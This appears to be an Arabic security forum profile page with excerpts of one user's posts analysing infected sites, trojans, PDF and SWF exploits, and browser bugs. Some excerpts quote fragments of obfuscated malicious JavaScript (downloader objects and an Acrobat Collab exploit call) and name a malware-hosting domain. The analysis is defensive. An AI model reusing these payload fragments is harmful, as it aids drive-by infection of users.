DATA_SNIPER
خبير Security
- الجزائر
- موقع عربي آخر، دومين صيني آخر وإصابة أخرى
تحليل عن طريق sandbox http://www.sunbeltsecurity.com/cwsandboxre...E4DE218185591C5
- موقع عربي آخر، دومين صيني آخر وإصابة أخرى
السلام عليكم. مرة أخرى معك يا AX :) يظهر وكأن الفيروس يعتمد على طرق قديمة نوعا ما: var rOQJEUnua = kWEd9TpMN.CreateObject('msxml2.XMLHTTP',''); var rugOFJD3F = kWEd9TpMN.CreateObject('Shell.Application',''); var wKhrK7bFp = kWEd9TpMN.CreateObject('adodb.stream…
- اختراق غريب ... برنامج ما يقوم بسرقة كلمة المرور لل Ftp
جيد،حاول ان لا تقع في نفس المشكلة رة أخرى ،وأنصحك بتثبي الكاسبر لأنه يحتوي على خاصية كشف Keylogger وغيرها من malware ، بالإضافة إلى قاعدة بياناته الضخمة.
- اختراق غريب ... برنامج ما يقوم بسرقة كلمة المرور لل Ftp
السلام عليكم. وهذا تقرير عن طريق Sandboxing Analysis من sunbeltsecurity http://www.sunbeltsecurity.com/cwsandboxre...DD13FCD0E5B9FA4
- اختراق غريب ... برنامج ما يقوم بسرقة كلمة المرور لل Ftp
السلام عليكم. لقد قمت بتحميل trojan وجميع ملحقاته وتم إرسالها للتحليل،ويعدها ننظر في الأمر. وظهر أن التروجان يعتمد على ثغرة في ملفات PDF كما تم توضيحهه بالإَافة إلى إتعمال و إستغلال ثغرة في SWF Files وهذه هي الملحقات swf & PDF Exploit J1k.EXE ==>trojan ولي عود…
- اختراق غريب ... برنامج ما يقوم بسرقة كلمة المرور لل Ftp
السلام عليكم. كنت قد حملت Keylogger من قبل لكن حذفته بالخطأ،لذلك ضع لنا الكود الضار والذي يتم وضعه في موقعك وبعدها سنستخرج Keylogger او Trojan ونعينك على حذفه من جهازك. ولاتنسى أن ترفق لنا موقعك لكي نحاول التفاعل مع الأكواد بشكل أفضل.
- كيف الحماية من برنامج Cain ؟
السلام عليكم ورحمة الله وبركاته. الأمر عادي. يجب تثبيت برنامج مضاد هجمات MITM وذلك عن طريق بعض البرامج من بينها AntiArp فهو برنامج مفيد. طريقة التركيب سهلة جدا،تثبيت عادي على Getway الخاص بالشبكة وسيقيك بشكل كامل على حد تجريبي. الأمر الآخر هو القيام بعملية تشف…
- مطلوب بحث عن Intrusion Detection
لذلك مسؤول الأمن الموجود على السيرفر يكون له تفحص دوري لل Log فلو تلاحظ موقع honeynet في تحدياتهم تكون التحديات هجمات حقيقية "على ما اظن" وتحليلها يتطلب دقة وتمييز "بشري". born to kill :) والسلام عليكم.
- ما رأيك بهذا الموقع؟ هل هو مصاب
بارك الله فيك أخي Xacker على المراسلة + أنه خطاب جميل ومرتب ;)
- مطلوب بحث عن Intrusion Detection
السلام عليكم. أخ fkugd2003 كلامك سليم لكن عندي ملاحظة فقط لاحظ من إسمه هو IDS نظام كشف دخلاء أي أنه لا يقوم بأي إجراء اما المقصود من كلامك هو IPS Intrusion Prevent System :) المهم IDS فيه أنواع منها Host-Based و Network-Based . هنالك كتاب يستحظرني الأن وهو جيد…
- ثغرة المتصفح نظرة تحليلة من الداخل
العفو، وإن أردتم أن تجزلوا في العطاء و الشكر فقولوا جزاك الله خيرا :)
- ما رأيك بهذا الموقع؟ هل هو مصاب
ملاحظة: التروجان يستخدم ثغرة أخرى بالإضافة للثغرة المذكورة في ملف PDF لاحظ هذا السطر: this.collabStore = Collab.collectEmailInfo({subj: "",msg: BPRJv}); هذه ثغرة أيضا في برنامج Adobe Acrobat. وهذا ما يجعلني أظن أن الموجود في الموقع ليس Infection عادي عن طريق S…
- تحليل ملفات ال Pdf و ال Shellcode
بارك الله فيك أخي محمد. كنت أكتب في موضوع عن PDF File Structure analyzing and exploiting.
- ما رأيك بهذا الموقع؟ هل هو مصاب
نعم أنت محق. فليقم أحد الإخوة بذلك. سأرفق السكريبت و الملفات. ملاحظة: لا تقم بتغير إمتداد ملف PDF فهو على شكل txt لأنه في الحالة العادية سيتم تشغيل الإكسبلويت بشكل مباشر عند تمرير مؤشر الماوس. لم أرفق التروجان وذلك يرجع إلى أني حذفته من الجهاز من غير قصد ويظهر…
- ما رأيك بهذا الموقع؟ هل هو مصاب
السلام عليكم. أحم أحم تيست تيست أن دو أن دو فيه صوت... طيـــــب جميل :lol: حسب مارئيت أنه لا يوجد أي شيئ في الكود الموجود في موقع hxxp://gumblar.cn جربت طلب هذا الرابط hxxp://gumblar.cn/rss/?id=425 فظهر الكود هذا: // No news...<script> var t=new Date(124144739…
- ما رأيك بهذا الموقع؟ هل هو مصاب
السلام عليكم ورحمة الله تعالى وبركاته. هل تظنون أن apache يقول هذا :) ، لا أدري لقد فككت السركيبت عن طريق برنامج malzila: وعند المحاولة لدخول gumblar.cn يصيح الفايرفوكس :) إلا أن هذا الأخير لا يوجد به شيئ. كما أظن أن الأمر ليس بتلك الخطورة. على فكرة عندما يصيح…
- تحليل ثغرة Firefox Xsl Parsing Remote Memory Corruption
السلام عليكم. بسم الله الرحمن الرحيم. اردت ان اعرج و اشرح شيئ مهم وهو ثغرة الفايرفوكس التي ظهرت ي الآونة الأخيرة. ولربما كثر التصعيد عليهاا بأنها ثغرة خطيرة قد تهدد الأمن الشخصي للمستخدمين،طبعا وبغض النظر عن نوعية الثغرة فإنها تعتبر خطيرة إذا توفرت شروط أخرى. …
- تم تحليل Conficker C
شكرا أخ mohfa على الروابط. للإضافة يقال أن صاحب الفيروس تم إلقاء القبض عليه ;)
- ثغرة من اكتشافي
السلام عليكم. قضية الإستثمار متعلقة بطبيعة الخطأ. يعني هل كتابة على عنوان العودة ام الإاشارة إلى عنوان غير موجود او محاولة تنفيذ تعليمة لعنوان غير موجود وهكذا وكل له إستثماره. لذلك فالخطوة الأولى لكتابة الإستثمار هو الإشارة إلى تعليمة الخطأ وأقصد بها التعليمة …
- ثغرة من اكتشافي
السلام عليكم. إكتشاف جميل يشبه إكتشاف للأخ جاس لنفس الثغرة في برنامج MSN . لكن عندي سؤال،هل ثغرة عبارة عن DOS فقط، يعني لا يمكن إستغلالها أم أنها قابلة للإستثمار. لا أظن أن المشكلة في parser بل في التعامل مع المعطيات الناتجة عن الـ Parser الخاص بالـXML .